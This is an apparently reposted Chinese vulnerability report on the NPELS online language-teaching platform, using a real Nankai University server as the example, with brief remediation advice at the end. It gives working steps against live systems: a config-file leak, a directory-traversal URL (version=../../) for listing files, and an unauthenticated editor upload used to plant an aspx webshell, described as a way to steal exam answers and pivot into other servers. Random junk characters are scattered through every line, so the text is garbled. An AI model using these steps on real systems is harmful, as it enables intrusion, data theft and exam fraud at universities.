好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中% y9 i3 s* I/ w; W1 h y, y4 A3 k: C
) ]2 x% J) f5 @( o0 c# }; F
详细说明:
4 P/ X6 a/ B/ h* @* X( g
" n/ ]5 c- H% D% k( N以南开大学的为例: . l% w* y9 t- `% Z0 f
http://222.30.60.3/NPELS2 ^+ T4 \5 C5 B0 A: O) ^# n; s! z" U7 s
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址% n7 ?7 A: Y) g; n! n) }
<setting name="Update_CommonSvr_CommonService" serializeAs="String">2 `$ P0 G/ i& _" d3 t
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
0 t9 h. g: o7 c% _: R</setting>
5 I& A" }. Z* v/ W: _7 ^+ H5 c1 l及版本号
& Y" m1 L: |/ S6 d1 F<add key="TVersion" value="1, 0, 0, 2187">
) s; ?) E( m: O0 e7 c$ j" d</add>
0 ~$ _; P$ `+ J" a$ ` a1 j直接访问% N1 c) f* g- a3 D
http://222.30.60.3/NPELS/CommonService.asmx4 M8 ]' N6 I( F" L) ]
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
1 i2 I9 n& S% a% `: p+ Ihttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21870 O1 s; `4 v. L0 w3 C6 R0 S
进一步列目录(返回的网页很大,可以直接 wget 下来)( G* N6 F# }$ f! L1 d
http://222.30.60.3/NPELS/CommonS ... List?version=../..// k& V4 R g, l6 m8 _
7 C+ d8 A% }/ R/ D" ?7 m发现: G5 _1 \8 h- s! Z3 J
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm* M4 ^& ~, ~1 _
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头% Q( l- y3 A; A( i$ l
上传后继续列目录找到木马地址直接访问即可
7 Y8 Y% l. G$ A4 _& l
7 M4 J/ F s$ I3 x" e0 {OOXX
7 n2 o0 j, `+ k# s( m 0 {- L. F$ U- Z; O- n0 y( ?: s: _
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法$ Z$ v* U9 F" r) D
漏洞证明:
! F2 K2 Z w: d$ A9 @: \! d9 ? * g7 K T9 q3 v+ c% l
列目录:
0 m3 [% I- D# c/ V c; n, Z" g% ihttp://222.30.60.3/NPELS/CommonS ... List?version=../../4 g& y7 E9 n: ~( e2 m! l6 ^
文件上传:5 {- q" D$ ]' [- _" a
http://222.30.60.3/npelsv/editor/editor.htm2 r2 k& r4 ~( p! X
- V d' V$ j6 M& J6 I4 ?7 `( a上传木马:! Q2 B2 c! A' Y- r
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx' H* c+ N3 n- W9 `& Q* s
H7 u; P& p9 N" p" F( p修复方案:8 S, A% L) } D' b/ A
好像考试系统必须使用 CommonService.asmx3 k( r# u. k( H
最好配置文件加密或者用别的方式不让它泄露出来
+ _. ]8 k) p' [7 ?! y/ |并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
# P9 d1 i" ^$ E2 A. T" ] |